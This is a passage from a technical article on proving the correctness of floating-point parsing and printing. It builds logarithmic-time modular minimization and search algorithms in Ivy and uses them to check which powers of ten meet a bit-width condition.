<math><mi>c</mi></math> with <math><mrow><mi>c</mi><mo>−</mo><mi>m</mi><mo>·</mo><mrow><mo stretchy=false>⌊</mo><mi>c</mi><mn>/</mn><mi>m</mi><mo stretchy=false>⌋</mo></mrow></mrow></math>,
updating <math><MI>𝑐𝑥</MI></math> as well.
<p>
Making both changes to our code, we get:
<pre><span style="color: #aaa">op modfirst (c m lo hi) =</span>
<span style="color: #aaa"> xr x cx mx = 0 0 1 0</span>
<span style="color: #aaa"> :while 1</span>
<span style="color: #aaa"> # (A) xr ≤ hi but perhaps xr < lo.</span>
<span style="color: #aaa"> :while xr < lo</span>
<span style="color: #aaa"> xr x = xr x + c cx</span>
<span style="color: #aaa"> :end</span>
<span style="color: #aaa"> xr <= hi: x</span>
<span style="color: #aaa"> # (B) xr - c < lo ≤ hi < xr</span>
m mx = m mx + (-c) cx * floor m/c
m == 0: -1
<span style="color: #aaa"> :while xr > hi</span>
<span style="color: #aaa"> xr x = xr x + (-m) mx</span>
<span style="color: #aaa"> :end</span>
<span style="color: #aaa"> lo <= xr: x</span>
c cx = c cx + (-m) mx * floor c/m
c == 0: -1
# (C) xr < lo ≤ hi < xr+m
<span style="color: #aaa"> :end</span>
</pre>
<p>
Notice that the loop is iterating (among other things)
<math><mrow><mi>m</mi><mo>=</mo><mi>m</mi><MO>mod</MO><mi>c</mi></mrow></math> and <math><mrow><mi>c</mi><mo>=</mo><mi>c</mi><MO>mod</MO><mi>m</mi></mrow></math>,
the same as Euclid’s GCD algorithm,
so <math><mrow><mi>O</mi><mo stretchy=false>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mspace width='0.3em' /></msub><mspace width='0.166em' /></mrow><mi>c</mi><mo stretchy=false>)</mo></mrow></math> iterations will zero <math><mi>c</mi></math> or <math><mi>m</mi></math>.
The old test for <math><mrow><mi>x</mi><mo>≥</mo><mi>m</mi></mrow></math> (made incorrect by modifiying <math><mi>m</mi></math>)
is replaced by checking for <math><mi>c</mi></math> or <math><mi>m</mi></math> becoming zero.
<p>
Finally, we should optimize away the small <code>while</code> loops by calculating how many times each will be executed:
<pre><span style="color: #aaa">op modfirst (c m lo hi) =</span>
<span style="color: #aaa"> xr x cx mx = 0 0 1 0</span>
<span style="color: #aaa"> :while 1</span>
<span style="color: #aaa"> # (A) xr ≤ hi but perhaps xr < lo.</span>
xr x = xr x + c cx * ceil (0 max lo-xr)/c
<span style="color: #aaa"> xr <= hi: x</span>
<span style="color: #aaa"> # (B) xr - c < lo ≤ hi < xr</span>
<span style="color: #aaa"> m mx = m mx + (-c) cx * floor m/c</span>
<span style="color: #aaa"> m == 0: -1</span>
xr x = xr x + (-m) mx * ceil (0 max xr-hi)/m
<span style="color: #aaa"> lo <= xr: x</span>
<span style="color: #aaa"> c cx = c cx + (-m) mx * floor c/m</span>
<span style="color: #aaa"> c == 0: -1</span>
<span style="color: #aaa"> # (C) xr < lo ≤ hi < xr+m</span>
<span style="color: #aaa"> :end</span>
</pre>
<p>
Each iteration of the outer <code>while</code> loop is now <math><mrow><mi>O</mi><mo stretchy=false>(</mo><mn>1</mn><mo stretchy=false>)</mo></mrow></math>,
and the loop runs at most <math><mrow><mi>O</mi><mo stretchy=false>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mspace width='0.3em' /></msub><mspace width='0.166em' /></mrow><mi>c</mi><mo stretchy=false>)</mo></mrow></math> times,
giving a total time of <math><mrow><mi>O</mi><mo stretchy=false>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mspace width='0.3em' /></msub><mspace width='0.166em' /></mrow><mi>c</mi><mo stretchy=false>)</mo></mrow></math>,
dramatically better than the old <math><mrow><mi>O</mi><mo stretchy=false>(</mo><mi>m</mi><mo stretchy=false>)</mo></mrow></math>.
<p>
We can reformat the code to highlight the regular structure:
<pre class='language-ivy'>op modfirst (c m lo hi) =
xr x cx mx = 0 0 1 0
:while 1
xr x = xr x + c cx * ceil (0 max lo-xr)/c ; xr <= hi : x
m mx = m mx + (-c) cx * floor m/c ; m == 0 : -1
xr x = xr x + (-m) mx * ceil (0 max xr-hi)/m ; lo <= xr : x
c cx = c cx + (-m) mx * floor c/m ; c == 0 : -1
:end
(modfirst 13 256 1 5) is 20 # 20*13 mod 256 = 4 ∈ [1, 5]
(modfirst 14 256 1 1) is -1 # impossible
</pre>
<p>
We can also check that <code>modfirst</code> finds the exact answer from case 2,
namely powers of five zeroing out the middle.
<pre class='language-ivy'>(modfirst (pm -3) (2**128) 1 (2**64)) is 125
spaced hex 125 * (pm -3)
-- out --
0x40 0000000000000000 0000000000000042
</pre>
<a class=anchor href="#modular_minimization"><h2 id="modular_minimization">Modular Minimization</h2></a>
<p>
Now we can solve the problem of finding the <math><mrow><mi>x</mi><mo>∈</mo><mo stretchy=false>[</mo><MI>𝑥𝑚𝑎𝑥</MI><mo>,</mo><MI>𝑥𝑚𝑖𝑛</MI><mo stretchy=false>]</mo></mrow></math> that minimizes <math><mrow><mi>x</mi><mo>·</mo><mi>c</mi><MO>mod</MO><mi>m</mi></mrow></math>.
<p>
Define the notation <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo>=</mo><mi>x</mi><mo>·</mo><mi>c</mi><MO>mod</MO><mi>m</mi></mrow></math> (the “residue” of <math><mi>x</mi></math>).
We can construct <math><mrow><mi>x</mi><mo>∈</mo><mo stretchy=false>[</mo><MI>𝑥𝑚𝑖𝑛</MI><mo>,</mo><MI>𝑥𝑚𝑎𝑥</MI><mo stretchy=false>]</mo></mrow></math> with minimal <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub></mrow></math> with the following greedy algorithm.
<ol>
<li>
Start with <math><mrow><mi>x</mi><mo>=</mo><MI>𝑥𝑚𝑖𝑛</MI></mrow></math>.
<li>
Find the first <math><mrow><mi>y</mi><mo>∈</mo><mo stretchy=false>[</mo><mi>x</mi><mo>+</mo><mn>1</mn><mo>,</mo><MI>𝑥𝑚𝑎𝑥</MI><mo stretchy=false>]</mo></mrow></math> such that <math><mrow><mi>y</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo><</mo><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub></mrow></math>.
<li>
If no such <math><mi>y</mi></math> exists, return <math><mi>x</mi></math>.
<li>
Set <math><mrow><mi>x</mi><mo>=</mo><mi>y</mi></mrow></math>.
<li>
Go to step 2.</ol>
<p>
The algorithm finds the right answer, because it starts at <math><MI>𝑥𝑚𝑖𝑛</MI></math> and then steps through
every succesively better answer along the way to <math><MI>𝑥𝑚𝑎𝑥</MI></math>.
The algorithm terminates because every search is finite and every step moves <math><mi>x</mi></math> forward by at least 1.
The only detail remaining is how to implement step 2.
<p>
For any <math><mi>x</mi></math> and <math><mi>y</mi></math>, <math><mrow><mo stretchy=false>(</mo><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo>−</mo><mi>y</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo stretchy=false>)</mo><MO>mod</MO><mi>m</mi><mo>=</mo><mo stretchy=false>(</mo><mi>x</mi><mo>−</mo><mi>y</mi><mo stretchy=false>)</mo><msub><mspace height='0em' /><mi>R</mi></msub></mrow></math>, because multiplication distributes over subtraction.
Call that the <i>subtraction lemma</i>.
<p>
Finding the first <math><mrow><mi>y</mi><mo>∈</mo><mo stretchy=false>[</mo><mi>x</mi><mo>+</mo><mn>1</mn><mo>,</mo><MI>𝑥𝑚𝑎𝑥</MI><mo stretchy=false>]</mo></mrow></math> with <math><mrow><mi>y</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo><</mo><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub></mrow></math>
is equivalent to finding the first <math><mrow><mi>d</mi><mo>∈</mo><mo stretchy=false>[</mo><mn>1</mn><mo>,</mo><MI>𝑥𝑚𝑎𝑥</MI><mo>−</mo><mi>x</mi><mo stretchy=false>]</mo></mrow></math> with <math><mrow><mo stretchy=false>(</mo><mi>x</mi><mo>+</mo><mi>d</mi><mo stretchy=false>)</mo><msub><mspace height='0em' /><mi>R</mi></msub><mo><</mo><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub></mrow></math>.
By the subtraction lemma, <math><mrow><mi>d</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo>=</mo><mo stretchy=false>(</mo><mo stretchy=false>(</mo><mi>x</mi><mo>+</mo><mi>d</mi><mo stretchy=false>)</mo><msub><mspace height='0em' /><mi>R</mi></msub><mo>−</mo><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo stretchy=false>)</mo><MO>mod</MO><mi>m</mi></mrow></math>,
so we are looking for the first <math><mrow><mi>d</mi><mo>≥</mo><mn>1</mn></mrow></math> with <math><mrow><mi>d</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo>∈</mo><mo stretchy=false>[</mo><mi>m</mi><mo>−</mo><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo>,</mo><mi>m</mi><mo>−</mo><mn>1</mn><mo stretchy=false>]</mo></mrow></math>.
That’s what <code>modfirst</code> does, except it searches <math><mrow><mi>d</mi><mo>≥</mo><mn>0</mn></mrow></math>.
But <math><mrow><mn>0</mn><msub><mspace height='0em' /><mi>R</mi></msub><mo>=</mo><mn>0</mn></mrow></math> and we will only search for <math><mrow><MI>𝑙𝑜</MI><mo>≥</mo><mn>1</mn></mrow></math>, so
<code>modfirst</code> can safely start its search at <math><mn>0</mn></math>.
<p>
Note that if <math><mrow><mi>d</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo>∈</mo><mo stretchy=false>[</mo><mi>m</mi><mo>−</mo><mo stretchy=false>(</mo><mi>x</mi><mo>+</mo><mi>d</mi><mo stretchy=false>)</mo><msub><mspace height='0em' /><mi>R</mi></msub><mo>,</mo><mi>m</mi><mo>−</mo><mn>1</mn><mo stretchy=false>]</mo></mrow></math>, the next iteration will choose the same <math><mi>d</mi></math>—any better answer would have been an answer to the original search.
So after finding <math><mi>d</mi></math>, we should add it to <math><mi>x</mi></math> as many times as we can.
<p>
The full algorithm is then:
<ol>
<li>
Start with <math><mrow><mi>x</mi><mo>=</mo><MI>𝑥𝑚𝑖𝑛</MI></mrow></math>.
<li>
Use <code>modfirst</code> to find the first <math><mrow><mi>d</mi><mo>≥</mo><mn>0</mn></mrow></math> such that <math><mrow><mi>d</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo>∈</mo><mo stretchy=false>[</mo><mi>m</mi><mo>−</mo><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo>,</mo><mi>m</mi><mo>−</mo><mn>1</mn><mo stretchy=false>]</mo></mrow></math>.
<li>
If no <math><mi>d</mi></math> exists or <math><mrow><mi>x</mi><mo>+</mo><mi>d</mi><mo>></mo><MI>𝑥𝑚𝑎𝑥</MI></mrow></math>, stop and return <math><mi>x</mi></math>. Otherwise continue.
<li>
Let <math><mrow><mi>s</mi><mo>=</mo><mi>m</mi><mo>−</mo><mi>d</mi><msub><mspace height='0em' /><mi>R</mi></msub></mrow></math>, the number we are effectively subtracting from <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub></mrow></math>.
<li>
Let <math><mi>n</mi></math> be the smaller of <math><mrow><mo stretchy=false>⌊</mo><mo stretchy=false>(</mo><MI>𝑥𝑚𝑎𝑥</MI><mo>−</mo><mi>x</mi><mo stretchy=false>)</mo><mn>/</mn><mi>d</mi><mo stretchy=false>⌋</mo></mrow></math> (the most times we can add <math><mi>d</mi></math> to <math><mi>x</mi></math>
before exceeding our limit) and <math><mrow><mo stretchy=false>⌊</mo><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub><mn>/</mn><mi>s</mi><mo stretchy=false>⌋</mo></mrow></math> (the most times we can subtract <math><mi>s</mi></math> from <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub></mrow></math>
before wrapping around).
<li>
Set <math><mrow><mi>x</mi><mo>=</mo><mi>x</mi><mo>+</mo><mi>d</mi><mo>·</mo><mi>n</mi></mrow></math>.
<li>
Go to step 2.</ol>
<p>
In Ivy, that algorithm is:
<pre class='language-ivy'>op modmin (xmin xmax c m) =
x = xmin
:while 1
xr = (x*c) mod m
d = modfirst c m, m - xr 1
(d < 0) or (x+d) > xmax: x
s = m - (d*c) mod m
x = x + d * floor ((xmax-x)/d) min xr/s
:end
(modmin 10 25 13 255) is 20
</pre>
<p>
The running time of <code>modmin</code> depends on what limits <math><mi>n</mi></math>.
If <math><mi>n</mi></math> is limited by <math><mrow><mo stretchy=false>(</mo><MI>𝑥𝑚𝑎𝑥</MI><mo>−</mo><mi>x</mi><mo stretchy=false>)</mo><mn>/</mn><mi>d</mi></mrow></math>
then the next iteration will not find a usable <math><mi>d</mi></math>,
since any future <math><mi>d</mi></math> would have to be bigger than the one we just found,
and there won’t be room to add it.
On the other hand, if <math><mi>n</mi></math> is limited by <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub><mn>/</mn><mi>s</mi></mrow></math>,
then it means we reduced <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub></mrow></math> at least by half.
That limits the number of iterations to <math><mrow><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>2</mn></msub><mspace width='0.166em' /></mrow><mi>m</mi></mrow></math>,
and since <code>modfirst</code> is <math><mrow><mi>O</mi><mo stretchy=false>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mrow></mrow></msub><mspace width='0.166em' /></mrow><mi>m</mi><mo stretchy=false>)</mo></mrow></math>, <code>modmin</code> is
<math><mrow><mi>O</mi><mo stretchy=false>(</mo><mtext>log</mtext><msup><mspace height='0.66em' /><mn>2</mn></msup><mspace width='0.166em' /><mi>m</mi><mo stretchy=false>)</mo></mrow></math>.
<p>
The subtraction lemma and <code>modfirst</code> let us build other useful operations too.
One obvious variant of <code>modmin</code> is <code>modmax</code>, which finds the <math><mrow><mi>x</mi><mo>∈</mo><mo stretchy=false>[</mo><MI>𝑥𝑚𝑖𝑛</MI><mo>,</mo><MI>𝑥𝑚𝑎𝑥</MI><mo stretchy=false>]</mo></mrow></math> that maximizes <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub></mrow></math>
and also runs in <math><mrow><mi>O</mi><mo stretchy=false>(</mo><mtext>log</mtext><msup><mspace height='0.66em' /><mn>2</mn></msup><mspace width='0.166em' /><mi>m</mi><mo stretchy=false>)</mo></mrow></math>.
<p>
We can extend <code>modmin</code> to minimize <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo>≥</mo><MI>𝑙𝑜</MI></mrow></math> instead,
by stepping to the first <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo>≥</mo><MI>𝑙𝑜</MI></mrow></math> before looking for improvements:
<pre class='language-ivy'>op modminge (xmin xmax c m lo) =
x = xmin
:if (xr = (x*c) mod m) < lo
d = modfirst c m (lo-xr) ((m-1)-xr)
d < 0: :ret -1
x = x + d
:end
:while 1
xr = (x*c) mod m
d = modfirst c m (m-(xr-lo)) (m-1)
(d < 0) or (x+d) > xmax: x
s = m - (d*c) mod m
x = x + d * floor ((xmax-x)/d) min (xr-lo)/s
:end
op modmin (xmin xmax c m) = modminge xmin xmax c m 0
(modmin 10 25 13 255) is 20
(modminge 10 25 13 255 6) is 21
(modminge 1 20 13 255 6) is 1
(modminge 10 20 255 255 1) is -1
</pre>
<p>
We can also invert the search to produce <code>modmax</code> and <code>modmaxle</code>:
<pre class='language-ivy'>op modmaxle (xmin xmax c m hi) =
x = xmin
:if (xr = (x*c) mod m) > hi
d = modfirst c m (m-xr) ((m-xr)+hi)
d < 0: :ret -1
x = x + d
:end
:while 1
xr = (x*c) mod m
d = modfirst c m 1 (hi-xr)
(d < 0) or (x+d) > xmax: x
s = (d*c) mod m
x = x + d * floor ((xmax-x)/d) min (hi-xr)/s
:end
op modmax (xmin xmax c m) = modmaxle xmin xmax c m (m-1)
(modmax 10 25 13 255) is 19
(modmaxle 10 25 13 255 200) is 15
</pre>
<p>
Another variant is <code>modfind</code>, which finds the first <math><mrow><mi>x</mi><mo>∈</mo><mo stretchy=false>[</mo><MI>𝑥𝑚𝑖𝑛</MI><mo>,</mo><MI>𝑥𝑚𝑎𝑥</MI><mo stretchy=false>]</mo></mrow></math> such that <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo>∈</mo><mo stretchy=false>[</mo><MI>𝑙𝑜</MI><mo>,</mo><mtext><i>hi</i></mtext><mo stretchy=false>]</mo></mrow></math>.
It doesn’t need a loop at all:
<pre class='language-ivy'>op modfind (xmin xmax c m lo hi) =
x = xmin
xr = (x*c) mod m
(lo <= xr) and xr <= hi: x
d = modfirst c m, (lo hi - xr) mod m
(d < 0) or (x+d) > xmax: -1
x+d
(modfind 21 100 13 256 1 10) is 40
</pre>
<p>
We can also build <code>modfindall</code>, which finds all the <math><mrow><mi>x</mi><mo>∈</mo><mo stretchy=false>[</mo><MI>𝑥𝑚𝑖𝑛</MI><mo>,</mo><MI>𝑥𝑚𝑎𝑥</MI><mo stretchy=false>]</mo></mrow></math> such that <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo>∈</mo><mo stretchy=false>[</mo><MI>𝑙𝑜</MI><mo>,</mo><mtext><i>hi</i></mtext><mo stretchy=false>]</mo></mrow></math>.
Because there might be a very large number, it stops after finding the first 100.
<pre class='language-ivy'>op modfindall (xmin xmax c m lo hi) =
all = ()
:while 1
x = modfind xmin xmax c m lo hi
x < 0: all
all = all, x
(count all) >= 100: all
xmin = x+1
:end
(modfindall 21 100 13 256 1 10) is 40 79 99
</pre>
<p>
Because <code>modfind</code> and <code>modfindall</code> both call <code>modfind</code> <math><mrow><mi>O</mi><mo stretchy=false>(</mo><mn>1</mn><mo stretchy=false>)</mo></mrow></math> times,
they both run in <math><mrow><mi>O</mi><mo stretchy=false>(</mo><mtext>log</mtext><mspace width='0.166em' /><mi>m</mi><mo stretchy=false>)</mo></mrow></math> time.
<a class=anchor href="#modular_proof"><h2 id="modular_proof">Modular Proof</h2></a>
<p>
Now we are ready to analyze individual powers.
<p>
For a given <math><MI>𝑝𝑚</MI></math>, <math><mi>b</mi></math>, and <math><mi>m</mi></math>,
we want to verify that for all <math><mrow><mi>x</mi><mo>∈</mo><mo stretchy=false>[</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>b</mi><mo>−</mo><mn>1</mn></mrow></msup><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup><mo stretchy=false>)</mo></mrow></math>,
we have <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≥</mo><mn>2</mn></mrow></math>,
or equivalently, <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><mo>=</mo><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI><MO>mod</MO><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>b</mi><MO lspace='0' rspace='0'>+</MO><mi>m</mi></mrow></msup><mo>≥</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>b</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></msup></mrow></math>.
We can use either <code>modmin</code> or <code>modfind</code> to do this.
Let’s use <code>modmin</code>, so we can show how close we came to
failing.
<p>
We’ll start with a function <code>check1</code> to check a single power,
and <code>show1</code> to format its result:
<pre class='language-ivy'># (b m) check1 p returns (p pm x middle fail) where pm is (pm p).
# If there is a counterexample to p, x is the first one,
# middle is (x*pm)'s middle bits, and fail is 1.
# If there is no counterexample, x middle fail are 0 0 0.
op (b m) check1 p =
x = modmin (2**b-1) ((2**b)-1) (pm p) (2**b+m)
middle = ((x * pm p) mod 2**b+m) >> b
p (pm p) x middle (middle < 2)
# show1 formats the result of check1.
op show1 (p pm x middle fail) =
p (hex pm) (hex x) (hex middle) ('.❌'[fail])
show1 64 64 check1 200
-- out --
200 0xa738c6bebb12d16cb428f8ac016561dc 0xffe389b3cdb6c3d0 0x34 .
</pre>
<p>
For <math><mrow><mi>p</mi><mo>=</mo><mn>200</mn></mrow></math>, no 64-bit input produces a 64-bit middle less than 2.
<p>
On the other hand, for <math><mrow><mi>p</mi><mo>=</mo><MO form='prefix'>−</MO><mn>1</mn></mrow></math>, we can verify that <code>check1</code> finds a multiple of 5 that zeroes the middle:
<pre class='language-ivy'>show1 64 64 check1 -1
-- out --
-1 0xcccccccccccccccccccccccccccccccd 0x8000000000000002 0x0 ❌
</pre>
<p>
Let’s check more than one power, gathering the results into a matrix:
<pre class='language-ivy'>op (b m) check ps = mix b m check1@ ps
op show table = mix show1@ table
show 64 64 check seq 25 35
-- out --
25 0x84595161401484a00000000000000000 0x8000000000000000 0x0 ❌
26 0xa56fa5b99019a5c80000000000000000 0x8000000000000000 0x0 ❌
27 0xcecb8f27f4200f3a0000000000000000 0x8000000000000000 0x0 ❌
28 0x813f3978f89409844000000000000000 0xec03c1a1aa24cc97 0x1 ❌
29 0xa18f07d736b90be55000000000000000 0xe06076f9cb96fe0d 0x5 .
30 0xc9f2c9cd04674edea400000000000000 0xfbd9be9d5bc8934e 0x1 ❌
31 0xfc6f7c40458122964d00000000000000 0x93997b98618e62a1 0x0 ❌
32 0x9dc5ada82b70b59df020000000000000 0xd0808609f474615a 0x2 .
33 0xc5371912364ce3056c28000000000000 0xc97002677c2de03f 0x0 ❌
34 0xf684df56c3e01bc6c732000000000000 0xc97002677c2de03f 0x0 ❌
35 0x9a130b963a6c115c3c7f400000000000 0xfd073be688a7dbaa 0x3 .
</pre>
<p>
Now let’s write code to show just the start and end of a table,
to avoid very long outputs:
<pre class='language-ivy'>op short table =
(count table) <= 15: table
(5 take table) ,% ((count table[0]) rho box '...') ,% (-5 take table)
short show 64 64 check seq 25 95
-- out --
25 0x84595161401484a00000000000000000 0x8000000000000000 0x0 ❌
26 0xa56fa5b99019a5c80000000000000000 0x8000000000000000 0x0 ❌
27 0xcecb8f27f4200f3a0000000000000000 0x8000000000000000 0x0 ❌
28 0x813f3978f89409844000000000000000 0xec03c1a1aa24cc97 0x1 ❌
29 0xa18f07d736b90be55000000000000000 0xe06076f9cb96fe0d 0x5 .
... ... ... ... ...
91 0x9d174b2dcec0e47b62eb0d64283f9c77 0xde861b1f480d3b9e 0x1 ❌
92 0xc45d1df942711d9a3ba5d0bd324f8395 0xe621cb57290a897f 0x0 ❌
93 0xf5746577930d6500ca8f44ec7ee3647a 0xa6bc10ca9dd53eff 0x1 ❌
94 0x9968bf6abbe85f207e998b13cf4e1ecc 0xd011cce372153a65 0x0 ❌
95 0xbfc2ef456ae276e89e3fedd8c321a67f 0xa674a3e92810fb84 0x0 ❌
</pre>
<p>
We can see that most powers are problematic for <math><mrow><mi>b</mi><mo>=</mo><mn>64</mn></mrow></math>, <math><mrow><mi>m</mi><mo>=</mo><mn>64</mn></mrow></math>,
which is why we’re not trying to prove that general case.
<p>
Let’s make it possible to filter the table down to just the bad powers:
<pre class='language-ivy'>op sel x = x sel iota count x
op bad table = table[sel table[;4] != 0]
short show bad 64 64 check seq -400 400
-- out --
-400 0x95fe7e07c91efafa3931b850df08e739 0xe4036416c4b21bd6 0x0 ❌
-399 0xbb7e1d89bb66b9b8c77e266516cb2107 0xe4036416c4b21bd6 0x0 ❌
-398 0xea5da4ec2a406826f95daffe5c7de949 0xe4036416c4b21bd6 0x0 ❌
-397 0x927a87139a6841185bda8dfef9ceb1ce 0xfcdbd01bdf2d3eb2 0x0 ❌
-395 0xe4df730ea142e5b60f857dde6652f5d1 0x99535e222a18bc6d 0x0 ❌
... ... ... ... ...
395 0x8f2bd39f334827e8c5874cc0ec691ba0 0xa462c66df06d90e3 0x0 ❌
397 0xdfb47aa8c020be5bb4a367ed71643b2a 0x90ae62dc5a2282dd 0x0 ❌
398 0x8bd0cca9781476f950e620f466dea4fb 0xd0be819cb0f1092e 0x0 ❌
399 0xaec4ffd3d61994b7a51fa93180964e39 0xa6fece16f3f40758 0x0 ❌
400 0xda763fc8cb9ff9e58e67937de0bbe1c7 0x8598a4df299005e0 0x0 ❌
</pre>
<p>
Now we have everything we need. Let’s write a function to try to prove
that <code>scale</code> is correct for a given <math><mi>b</mi></math> and <math><mi>m</mi></math>.
<pre class='language-ivy'>op prove (b m) =
table = bad b m check (seq -400 -28), (seq 28 400)
what = 'b=', (text b), ' m=', (text m), ' t=', (text 127-m), '+½'
(count table) == 0: print '✅ proved ' what
print '❌ disproved' what
print short show table
</pre>
<p>
This function builds a table of all the bad powers for <math><mrow><mi>b</mi><mo>,</mo><mi>m</mi></mrow></math>.
If the table is empty, it prints that the settings have been proved.
If not, it prints that the settings are unproven
and prints some of the questionable powers.
<p>
If we try to prove <math><mrow><mn>64</mn><mo>,</mo><mn>64</mn></mrow></math>, we get many unproven powers.
<pre class='language-ivy'>prove 64 64
-- out --
❌ disproved b=64 m=64 t=63+½
-400 0x95fe7e07c91efafa3931b850df08e739 0xe4036416c4b21bd6 0x0 ❌
-399 0xbb7e1d89bb66b9b8c77e266516cb2107 0xe4036416c4b21bd6 0x0 ❌
-398 0xea5da4ec2a406826f95daffe5c7de949 0xe4036416c4b21bd6 0x0 ❌
-397 0x927a87139a6841185bda8dfef9ceb1ce 0xfcdbd01bdf2d3eb2 0x0 ❌
-395 0xe4df730ea142e5b60f857dde6652f5d1 0x99535e222a18bc6d 0x0 ❌
... ... ... ... ...
395 0x8f2bd39f334827e8c5874cc0ec691ba0 0xa462c66df06d90e3 0x0 ❌
397 0xdfb47aa8c020be5bb4a367ed71643b2a 0x90ae62dc5a2282dd 0x0 ❌
398 0x8bd0cca9781476f950e620f466dea4fb 0xd0be819cb0f1092e 0x0 ❌
399 0xaec4ffd3d61994b7a51fa93180964e39 0xa6fece16f3f40758 0x0 ❌
400 0xda763fc8cb9ff9e58e67937de0bbe1c7 0x8598a4df299005e0 0x0 ❌
</pre>
<a class=anchor href="#large_powers_printing"><h2 id="large_powers_printing">Large Powers, Printing</h2></a>
<p>
For printing, we need to prove <math><mrow><mi>b</mi><mo>=</mo><mn>55</mn><mo>,</mo><mi>m</mi><mo>=</mo><mn>66</mn></mrow></math>.
<pre class='language-ivy'>prove 55 66
-- out --
✅ proved b=55 m=66 t=61+½
</pre>
<p>
It works! In fact we can shorten the middle to 64 bits
before things get iffy:
<pre class='language-ivy'>prove 55 66
prove 55 65
prove 55 64
prove 55 63
prove 55 62
-- out --
✅ proved b=55 m=66 t=61+½
✅ proved b=55 m=65 t=62+½
✅ proved b=55 m=64 t=63+½
❌ disproved b=55 m=63 t=64+½
167 0xd910f7ff28069da41b2ba1518094da05 0x7b6e56a6b7fd53 0x0 ❌
❌ disproved b=55 m=62 t=65+½
167 0xd910f7ff28069da41b2ba1518094da05 0x7b6e56a6b7fd53 0x0 ❌
201 0xd106f86e69d785c7e13336d701beba53 0x68224666341b59 0x1 ❌
211 0xf356f7ebf83552fe0583f6b8c4124d44 0x69923a6ce74f07 0x0 ❌
</pre>
<div class=lemma id=lemma9>
<p>
<b>Lemma 9</b>. For <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>400</mn><mo>,</mo><MO form='prefix'>−</MO><mn>28</mn><mo stretchy=false>]</mo><mo>∪</mo><mo stretchy=false>[</mo><mn>28</mn><mo>,</mo><mn>400</mn><mo stretchy=false>]</mo></mrow></math>, <math><mrow><mi>b</mi><mo>≤</mo><mn>55</mn></mrow></math>, and <math><mrow><mi>m</mi><mo>≥</mo><mn>66</mn></mrow></math>, <math><mrow><mtext>Scale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> and <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math>.
<p>
<i>Proof</i>. We calculated above that <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≥</mo><mn>2</mn></mrow></math>. By <a href="#lemma4">Lemma 4</a>, <math><mrow><mtext>Scale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math>. <math><mo>∎</mo></math>
</div>
<a class=anchor href="#large_powers_parsing"><h2 id="large_powers_parsing">Large Powers, Parsing</h2></a>
<p>
For parsing, we want to prove <math><mrow><mi>b</mi><mo>=</mo><mn>64</mn></mrow></math>, <math><mrow><mi>m</mi><mo>=</mo><mn>73</mn></mrow></math>.
<pre class='language-ivy'>prove 64 73
-- out --
✅ proved b=64 m=73 t=54+½
</pre>
<p>
It also works! But we’re right on the edge.
Shortening the middle by one bit breaks the proof:
<pre class='language-ivy'>prove 64 73
prove 64 72
-- out --
✅ proved b=64 m=73 t=54+½
❌ disproved b=64 m=72 t=55+½
-93 0x857fcae62d8493a56f70a4400c562ddc 0xf324bb0720dbe7fe 0x1 ❌
</pre>
<div class=lemma id=lemma10>
<p>
